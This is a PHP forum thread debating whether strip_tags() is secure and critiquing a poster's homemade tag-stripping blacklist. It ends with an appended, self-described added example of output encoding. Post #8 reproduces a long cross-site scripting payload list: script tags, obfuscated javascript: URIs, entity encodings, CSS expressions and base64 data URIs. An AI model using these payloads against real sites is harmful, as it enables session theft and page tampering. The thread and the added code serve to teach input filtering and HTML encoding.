Thread: Secure function for Strip tags! - Download

  1. #1 Y.P.Y (Thread Starter)

    _______________

    ______________________
    Last edited by Y.P.Y; Apr 28th, 2012 at 05:11 PM.

  2. #2 the182guy

    Chris

  3. #3 Y.P.Y (Thread Starter)

    Last edited by Y.P.Y; Nov 5th, 2008 at 12:55 PM.

  4. #4 the182guy

    Why is it not secure?

    According to this the strip_tags vulnerability was fixed in CVS in 2004.
    Chris

  5. #5 kfcSmitty

    The only vulnerability I could find is listed here:

    http://www.net-security.org/vuln.php?id=3570

    And it has been fixed since then. What vulnerability are you talking about, Y.P.Y?

  6. #6 dclamp

    Quote Originally Posted by Y.P.Y
    This function works fine. The person who posted that note obviously did something wrong.

    it works perfectly fine for me

    http://subsoft.net/personal/strip_tags.phps [Script File]
    http://subsoft.net/personal/strip_tags.php

    PHP Code:
    <?php
    // a single very long <param> tag
    $html =<<<EOF
    <param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm
    ...[snip]...
    vie%20of%20All-Time"/>
    EOF;

    echo strip_tags($html, '<param>');
    // this outputs an empty string
    ?>
    outputs:
    HTML Code:
    <param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm
    ...[snip]...
    vie%20of%20All-Time"/>

  7. #7 I_Love_My_Vans

    Another attempt by Y.P.Y to take over the world with unindented PHP code.

    I agree with everyone else, it would appear any vulnerabilities were fixed long ago...

    ...however, keep going, and keep learning.

  8. #8 Y.P.Y (Thread Starter)

    Check with this value:
    Code:
    <script>alert(document.cookie)</script>
    <IMG SRC="javascript:alert("XSS");">
    <IMG SRC=javascript:alert("XSS")>
    <IMG SRC=JaVaScRiPt:alert("XSS")>
    <IMG SRC=javascript:alert(&quot;XSS&quot>
    <IMG SRC=`javascript:alert("XSS")`>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; &#39;&#88;&#83;&#83;&#39;&#41;>
    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000 058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#00000 39&#0000041>
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58& #x53&#x53&#x27&#x29>
    <IMG SRC="jav ascript:alert("XSS");">
    <IMG SRC="jav&#x09;ascript:alert("XSS");">
    <IMG SRC="jav&#x0A;ascript:alert("XSS");">
    <IMG SRC="jav&#x0D;ascript:alert("XSS");">
    <IMG
    SRC
    =
    "
    j
    a
    v
    a
    s
    c
    r
    i
    p
    t
    :
    a
    l
    e
    r
    t
    (
    "
    X
    S
    S
    "
    )
    "
    >
    <IMG SRC="  javascript:alert("XSS");">
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    <<SCRIPT>alert("XSS");//<</SCRIPT>
    <IMG SRC="javascript:alert("XSS")"
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    <SCRIPT>a=/XSS/
    alert(a.source)</SCRIPT>
    </TITLE><SCRIPT>alert("XSS");</SCRIPT>
    <INPUT TYPE="IMAGE" SRC="javascript:alert("XSS");">
    <BODY BACKGROUND="javascript:alert("XSS")">
    <BODY ONLOAD=alert("XSS")>
    <IMG DYNSRC="javascript:alert("XSS")">
    <IMG LOWSRC="javascript:alert("XSS")">
    <BGSOUND SRC="javascript:alert("XSS");">
    <BR SIZE="&{alert("XSS")}">
    <LINK REL="stylesheet" HREF="javascript:alert("XSS");">
    <XSS STYLE="behavior: url(xss.htc);">
    <STYLE>li {list-style-image: url("javascript:alert("XSS")");}</STYLE><UL><LI>XSS
    <IMG SRC="vbscript:msgbox("XSS")">
    <IMG SRC="mocha:[code]">
    <IMG SRC="livescript:[code]">
    ¼script¾alert(¢XSS¢)¼/script¾
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">
    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert("XSS");">
    <IFRAME SRC="javascript:alert("XSS");"></IFRAME>
    <FRAMESET><FRAME SRC="javascript:alert("XSS");"></FRAMESET>
    <TABLE BACKGROUND="javascript:alert("XSS")">
    <TABLE><TD BACKGROUND="javascript:alert("XSS")">
    <DIV STYLE="background-image: url(javascript:alert("XSS"))">
    <DIV STYLE="background-image:\0075\0072\006C\0028"\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029"\0029">
    <DIV STYLE="background-image: url(javascript:alert("XSS"))">
    <DIV STYLE="width: expression(alert("XSS"));">
    <STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
    <IMG STYLE="xss:expr/*XSS*/ession(alert("XSS"))">
    <XSS STYLE="xss:expression(alert("XSS"))">
    exp/*<A STYLE="no\xss:noxss("*//*");
    xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))">
    <STYLE>.XSS{background-image:url("javascript:alert("XSS")");}</STYLE><A CLASS=XSS></A>
    <STYLE type="text/css">BODY{background:url("javascript:alert("XSS")")}</STYLE>
    <SCRIPT>alert("XSS");</SCRIPT>
    <BASE HREF="javascript:alert("XSS");//">
    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert("XSS")></OBJECT>
    <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
    a="get";
    b="URL(\"";
    c="javascript:";
    d="alert("XSS");\")";
    eval(a+b+c+d);
    <HTML xmlns:xss>
    <xss:xss>XSS</xss:xss>
    <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert("XSS");">]]>
    </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    <XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert("XSS")"&gt;</B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
    <XML SRC="xsstest.xml" ID=I></XML>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
    <? echo("<SCR)";
    echo("IPT>alert("XSS")</SCRIPT>"); ?>
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;">
    <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert("XSS");+ADw-/SCRIPT+AD4-
    <A HREF="http://1113982867/">XSS</A>
    <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
    <A HREF="http://0102.0146.0007.00000223/">XSS</A>
    <A HREF="h
    tt	p://6	6.000146.0x7.147/">XSS</A>
    <
    %3C
    &lt
    &lt;
    &LT
    &LT;
    &#60
    &#060
    &#0060
    &#00060
    &#000060
    &#0000060
    &#60;
    &#060;
    &#0060;
    &#00060;
    &#000060;
    &#0000060;
    &#x3c
    &#x03c
    &#x003c
    &#x0003c
    &#x00003c
    &#x000003c
    &#x3c;
    &#x03c;
    &#x003c;
    &#x0003c;
    &#x00003c;
    &#x000003c;
    &#X3c
    &#X03c
    &#X003c
    &#X0003c
    &#X00003c
    &#X000003c
    &#X3c;
    &#X03c;
    &#X003c;
    &#X0003c;
    &#X00003c;
    &#X000003c;
    &#x3C
    &#x03C
    &#x003C
    &#x0003C
    &#x00003C
    &#x000003C
    &#x3C;
    &#x03C;
    &#x003C;
    &#x0003C;
    &#x00003C;
    &#x000003C;
    &#X3C
    &#X03C
    &#X003C
    &#X0003C
    &#X00003C
    &#X000003C
    &#X3C;
    &#X03C;
    &#X003C;
    &#X0003C;
    &#X00003C;
    &#X000003C;
    \x3c
    \x3C
    \u003c
    \u003C

  9. #9 I_Love_My_Vans

    ...I think you broke the internet, you might need to amend your code tags...

  10. #10 kfcSmitty

    Yours trims out too much. It also doesn't have the ability to omit tags in the replace.

    For example, if I was echoing something without the tags, I may want my code properly aligned in the background.

    PHP Code:
    echo _Strip_Tag("<s\0\0cript>\n\ntesting");
    echo strip_tags("<script>\n\ntesting<s\0cript>");

    Your function will strip out the newline character, whereas the real strip_tags allows it.

  11. #11 dclamp

    @ YPY: The strip tags function is meant to strip tags, not to remove harmful javascript...

  12. #12 Y.P.Y (Thread Starter)

    Tag is all. JavaScript, HTML, VBScript...

  13. #13 visualAd

    Please, please invest some of your hard earned money in a "Beginning PHP 5" book.
    PHP Code:
    function _Strip_Tag($Str_Input)
    {
        @settype($Str_Input, 'string'); ///// no need to do this and no need to prefix it with the error suppression operator

        $Str_Input = @strip_tags($Str_Input); //// again why are you using the error suppression operator?

        // where did you get these from? The hexadecimal numbers are not even valid
        // HTML entities. The script tags would have been removed by strip tags as would the comments
        $_Ary_TagsList = array(
            'jav&#x0A;ascript:', 'jav&#x0D;ascript:', 'jav&#x09;ascript:', 'JaVaScRiPt:', 'JAVASCRIPT:',
            '<script>', '<SCRIPT>', '<script >', '<noscript>', '</script>', '<!-', '<', '>', '%3C',
            '&lt', '&lt;', '&LT', '&LT;',
            '&#60', '&#060', '&#0060', '&#00060', '&#000060', '&#0000060',
            '<', '<', '<', '<', '<', '<',
            '&#x3c', '&#x03c', '&#x003c', '&#x0003c', '&#x00003c', '&#x000003c',
            '&#x3c;', '&#x03c;', '&#x003c;', '&#x0003c;', '&#x00003c;', '&#x000003c;',
            '&#X3c', '&#X03c', '&#X003c', '&#X0003c', '&#X00003c', '&#X000003c',
            '&#X3c;', '&#X03c;', '&#X003c;', '&#X0003c;', '&#X00003c;', '&#X000003c;',
            '&#x3C', '&#x03C', '&#x003C', '&#x0003C', '&#x00003C', '&#x000003C',
            '&#x3C;', '&#x03C;', '&#x003C;', '&#x0003C;', '&#x00003C;', '&#x000003C;',
            '&#X3C', '&#X03C', '&#X003C', '&#X0003C', '&#X00003C', '&#X000003C',
            '&#X3C;', '&#X03C;', '&#X003C;', '&#X0003C;', '&#X00003C;', '&#X000003C;',
            '\x3c', '\x3C', '\u003c', '\u003C', chr(60), chr(62)
        );
        $Str_Input = @str_replace($_Ary_TagsList, '', $Str_Input);

        // I've never seen anything so pointless in my life - what does this do
        // except remove two new lines?
        $Str_Input = @str_replace("\n\n", '', $Str_Input);

        // it was a string in the first place, why try and cast it back to a string?
        return((string)$Str_Input);
    }

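    The three objections raised in #10 (newlines lost), #11 (strip_tags is a tag remover, not a script filter) and #13 (the entity blacklist is pointless) side by side in runnable PHP. This is an added example, not code from the thread or from any poster; the function names and the sample strings are constructed for it.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread or any poster. Helper names and
// sample inputs below are constructed for illustration.

// (a) strip_tags() removes tag syntax only. A tag allowed through its
//     $allowed_tags argument is kept whole, attributes included.
function stripKeepingImg(string $html): string
{
    return strip_tags($html, '<img>');
}

// (b) A blacklist in the style of the thread's _Strip_Tag(): strip_tags()
//     followed by deleting entities, brackets and blank lines. Entities are
//     already plain text, so this step only damages legitimate input.
function blacklistStrip(string $text): string
{
    $text = strip_tags($text);
    return str_replace(['<', '>', '&lt;', '&gt;', "\n\n"], '', $text);
}

// (c) Output encoding for an HTML text node: '<', '>', '&', '"' and "'" become
//     entities, so the browser shows the input as text and executes nothing.
//     Attribute, URL and JavaScript contexts each need their own encoder, and
//     "allow some HTML" calls for an allow-list sanitizer, not a blacklist.
function encodeForHtmlText(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: one vector from the thread's list, one allowed tag with
// a script-bearing attribute, and ordinary user text containing entities.
$vector = '<script>alert(document.cookie)</script>';
$imgTag = '<img src="javascript:alert(\'XSS\')">';
$prose  = "Write &lt;b&gt; for bold.\n\nSecond paragraph.";

// (a) true: the src attribute is still there after strip_tags()
var_dump(stripKeepingImg($imgTag) === $imgTag);

// (b) the entities and the paragraph break are gone; the text is corrupted
var_dump(blacklistStrip($prose));

// (c) the vector is now inert text; the prose keeps its entities and newlines
var_dump(encodeForHtmlText($vector));
var_dump(encodeForHtmlText($prose));
```

    Use nl2br() on the encoded string if paragraph breaks must render as line breaks; encoding first and converting afterwards keeps the newline behaviour kfcSmitty wanted without reopening the tag syntax.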
